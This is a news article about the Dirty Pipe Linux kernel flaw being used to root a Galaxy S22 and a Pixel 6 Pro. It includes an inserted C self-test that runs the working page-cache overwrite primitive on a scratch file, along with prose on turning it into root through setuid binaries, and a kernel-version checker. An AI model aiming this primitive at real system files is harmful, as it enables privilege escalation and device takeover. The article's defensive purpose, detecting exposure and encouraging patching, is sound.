Pixel 6 Pro and Galaxy S22 were completely dominated in the Dirty Pipe exploit demonstration.

MobileCafe
Earlier today, @Fire30_ shared a video on Twitter demonstrating how the new Dirty Pipe Linux kernel vulnerability can be exploited to gain root on Android, on both a Galaxy S22 and a Pixel 6 Pro, both of which appear to be up to date with security patches. In each case a root shell was obtained in under a minute with minimal effort. That cuts two ways: a simple root method that enthusiasts will appreciate, and a serious security problem for everyone else.

If you haven't been keeping up with the news, a new kernel-level vulnerability known as Dirty Pipe (CVE-2022-0847) was just disclosed. The details are involved, but the short version is that an unprivileged process on an affected Linux kernel can overwrite data in the page cache of any file it is allowed to read, because of how the kernel tracks flags on pipe buffers when file data is spliced into a pipe. Data written into the pipe is merged straight into the file's cached page, so you end up writing to a file you should only be able to read. The result is local privilege escalation, i.e. root access, among other things.

Used carefully, this turns into arbitrary code execution as root: the attacker overwrites a file that a privileged process will read or execute (a setuid binary, or a shared library loaded by a root process), after which an app or piece of software can do pretty much anything it wants within other technical constraints, such as reading things it shouldn't have access to and performing operations that should require permissions it doesn't have. The bug was introduced in Linux 5.8, so it affects devices running 5.8 and later, Android included.
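Since the article describes the primitive only in words, here is an added example (not from the article, and not @Fire30_'s exploit) that runs the Dirty Pipe primitive against a scratch file it creates itself, so the three steps are visible: prime the pipe buffers, splice one byte of a read-only file into the pipe, then write into the pipe. It assumes a Linux system with a writable /tmp, uses the raw splice syscall so it builds regardless of feature macros, and the scratch file's contents and the "DIRTY" marker are constructed for the check. On a patched kernel it reports 0; on a 5.8 kernel without the fix it reports 1, because the marker shows up in the read-only file's page cache. It is a self-check on a throwaway file, not something to point at system files.

```c
/* Added example, not from the article or from @Fire30_'s demo: a self-check
 * that runs the Dirty Pipe (CVE-2022-0847) primitive against a scratch file
 * it creates itself and reports whether the kernel let data written into a
 * pipe land in the page cache of a file opened read-only. Linux only; no
 * system file is touched, and the scratch file is removed afterwards. */
#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/syscall.h>

/* F_GETPIPE_SZ is Linux-specific (F_LINUX_SPECIFIC_BASE + 8); define it in
 * case the headers were included without _GNU_SOURCE. */
#ifndef F_GETPIPE_SZ
#define F_GETPIPE_SZ 1032
#endif

/* Step 1: leave PIPE_BUF_FLAG_CAN_MERGE set on every buffer of the pipe.
 * write() into a pipe creates anonymous pages with the flag set; read()
 * drains them, but the recycled pipe_buffer slots keep their flags. */
static int prime_pipe(int pfd[2]) {
    int size = fcntl(pfd[1], F_GETPIPE_SZ);
    if (size <= 0) return -1;
    char *buf = calloc(1, (size_t)size);
    if (!buf) return -1;
    int ok = write(pfd[1], buf, (size_t)size) == (ssize_t)size &&
             read(pfd[0], buf, (size_t)size) == (ssize_t)size;
    free(buf);
    return ok ? 0 : -1;
}

/* Returns 1 if the page cache of `path` (opened O_RDONLY) was modified
 * through the pipe (kernel vulnerable), 0 if it was not, -1 on error. */
int dirty_pipe_probe(const char *path) {
    static const char marker[] = "DIRTY";   /* constructed marker */
    const size_t mlen = sizeof marker - 1;
    int pfd[2], rc = -1;
    int fd = open(path, O_RDONLY);
    if (fd < 0) return -1;
    if (pipe(pfd) < 0) { close(fd); return -1; }
    if (prime_pipe(pfd) == 0) {
        /* Step 2: splice one byte of the file into the pipe. The bug is that
         * splice() does not clear CAN_MERGE on the buffer that now points at
         * the file's page-cache page. Raw syscall: no __USE_GNU prototype needed. */
        long long off = 0;
        if (syscall(SYS_splice, fd, &off, pfd[1], NULL, (size_t)1, 0U) == 1 &&
            /* Step 3: write() into the pipe. With CAN_MERGE still set, the
             * kernel appends the data to that page-cache page, i.e. at file
             * offset 1, right after the spliced byte, within the same page. */
            write(pfd[1], marker, mlen) == (ssize_t)mlen) {
            char buf[16] = {0};
            /* Read the file back through the page cache and compare. */
            if (lseek(fd, 0, SEEK_SET) == 0 &&
                read(fd, buf, mlen + 1) == (ssize_t)(mlen + 1))
                rc = memcmp(buf + 1, marker, mlen) == 0;
        }
    }
    close(pfd[0]);
    close(pfd[1]);
    close(fd);
    return rc;
}

/* Creates a scratch file of known content, runs the probe, cleans up. */
int dirty_pipe_self_test(void) {
    char tmpl[] = "/tmp/dirtypipe-probe-XXXXXX";   /* assumed writable /tmp */
    const char content[] = "AAAAAAAAAAAAAAAA";     /* constructed sample file */
    int rc = -1;
    int fd = mkstemp(tmpl);
    if (fd < 0) return -1;
    if (write(fd, content, sizeof content - 1) == (ssize_t)(sizeof content - 1)) {
        close(fd);
        rc = dirty_pipe_probe(tmpl);
    } else {
        close(fd);
    }
    unlink(tmpl);
    return rc;
}

int main(void) {
    int r = dirty_pipe_self_test();
    if (r < 0) { perror("probe"); return 2; }
    puts(r ? "VULNERABLE: read-only file's page cache was modified through a pipe"
           : "not vulnerable: the write stayed in the pipe");
    return r;
}
```

Compile with `cc` and run it; the exit status is 1 when the page cache of the read-only file was modified. The write goes only into the cached page and is never marked dirty, which is exactly why the real exploit targets files a privileged process will read from the cache soon afterwards.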

Fixes for the Linux kernel have already been released (upstream stable releases 5.16.11, 5.15.25 and 5.10.102 carry the patch), and Android is expected to address the problem in an upcoming monthly security patch level. We haven't heard of the exploit being used in the wild yet, but that is sure to change.

The video, which was shared on Twitter, shows both a Samsung Galaxy S22 and a Google Pixel 6 Pro gaining a root shell via the Dirty Pipe vulnerability, and even switching SELinux into permissive mode. That is a good illustration of the potential harm: with root, an app has practically unrestricted access, and with SELinux in permissive mode the mandatory access control that is one of an Android device's main security layers is no longer enforced (policy violations are logged but allowed). In the old computer jargon, the phone is nearly totally "owned".

According to a security researcher, the practical impact of the vulnerability may still depend on various mitigating factors, beyond the basic requirement of a recent enough kernel. The great majority of Android devices currently run older Linux kernels, which are not affected.

Finally, while the video shows an external device obtaining the root shell, I've been assured that, based on what's been demonstrated, the exploit can almost certainly be carried out entirely on-device by an ordinary app. Enthusiasts may be salivating, since it is a way to obtain (presumably non-persistent) root on Samsung phones, right past the company's less-than-hardened Knox protections. Even without modifying the system for permanent root (which would trip additional detection mechanisms and cause other problems), an app could simply wait for the BOOT_COMPLETED broadcast and re-obtain non-persistent root on every boot. Of course, a malicious app could use all of this for far worse purposes.

A rogue app with root access can do serious damage, stealing your files, photos, messages and other data, among other things. Without enumerating every possible abuse, this is a critical and severe vulnerability.

Again, we are not aware of any active in-the-wild use of the vulnerability, and only a small proportion of very recently launched devices are expected to be vulnerable. If you're concerned, check your kernel version (typically under Settings -> About phone; it is listed under "Software information" on Samsung phones and under "Android version" on Pixels). If the kernel version shown is below 5.8, the exploit will almost certainly not work on your phone. A version of 5.8 or higher does not by itself mean you are exposed: the fix is a small patch that vendors can backport without changing the version number, so the Android security patch level that ships the fix is the reliable indicator.
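If you would rather automate that version check, here is an added example (not from the article) that classifies a kernel release string in the form `uname -r` (or `adb shell uname -r`) prints it. The status codes are my own convention; the fix versions are the upstream stable releases that carry the patch (5.10.102, 5.15.25, 5.16.11), and everything from 5.17 final upward is treated as fixed. The same caveat applies: a vendor backport leaves the version string unchanged, so status 1 means "check the security patch level", not "confirmed vulnerable".

```c
/* Added example, not from the article: classify a kernel release string
 * (what `uname -r` or `adb shell uname -r` prints) against the Dirty Pipe
 * (CVE-2022-0847) version window. Return codes are this example's own
 * convention:
 *   0 = below 5.8, not affected
 *   1 = in the affected range, no upstream stable fix at this version
 *   2 = at or above an upstream fixed release
 *  -1 = unparseable
 * Caveat: vendors backport the fix without bumping the version, so 1 means
 * "check the security patch level", not "confirmed vulnerable". */
#include <stdio.h>
#include <stdlib.h>
#include <sys/utsname.h>

int dirty_pipe_version_status(const char *release) {
    int v[3] = {0, 0, 0};   /* major, minor, patch */
    int n_parsed = 0;
    const char *p = release;
    for (int i = 0; i < 3; i++) {
        char *end;
        long n = strtol(p, &end, 10);
        if (end == p || n < 0) break;
        v[i] = (int)n;
        n_parsed++;
        if (*end != '.') break;   /* end of string or "-android12-9-..." suffix */
        p = end + 1;
    }
    if (n_parsed < 2) return -1;  /* need at least major.minor */

    if (v[0] < 5 || (v[0] == 5 && v[1] < 8)) return 0;   /* bug introduced in 5.8 */
    if (v[0] > 5 || v[1] >= 17) return 2;                 /* fixed before 5.17 final */
    switch (v[1]) {
    case 10: return v[2] >= 102 ? 2 : 1;   /* fixed in 5.10.102 */
    case 15: return v[2] >= 25  ? 2 : 1;   /* fixed in 5.15.25 */
    case 16: return v[2] >= 11  ? 2 : 1;   /* fixed in 5.16.11 */
    default: return 1;   /* 5.8, 5.9, 5.11-5.14: end-of-life upstream, no fixed release */
    }
}

static const char *status_text(int s) {
    switch (s) {
    case 0:  return "kernel predates 5.8: not affected by Dirty Pipe";
    case 1:  return "kernel in the affected 5.8+ range with no upstream fix at this version: check the security patch level";
    case 2:  return "kernel at or above an upstream fixed release";
    default: return "could not parse kernel release string";
    }
}

int main(void) {
    struct utsname u;
    if (uname(&u) != 0) { perror("uname"); return 2; }
    printf("%s -> %s\n", u.release, status_text(dirty_pipe_version_status(u.release)));
    return 0;
}
```

Run on the device (or feed it the string from `adb shell uname -r`); the Android GKI suffix after the patch number is ignored by the parser.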

It is conceivable that Google will update Play Protect to reduce the odds of installing an app that exploits the vulnerability (whether from the Play Store or by sideloading from unknown sources). We contacted Google for further information, but the company did not respond promptly to our inquiries. In the meantime, if you have a phone that may be affected, it is best to stick to installing apps from trusted sources.
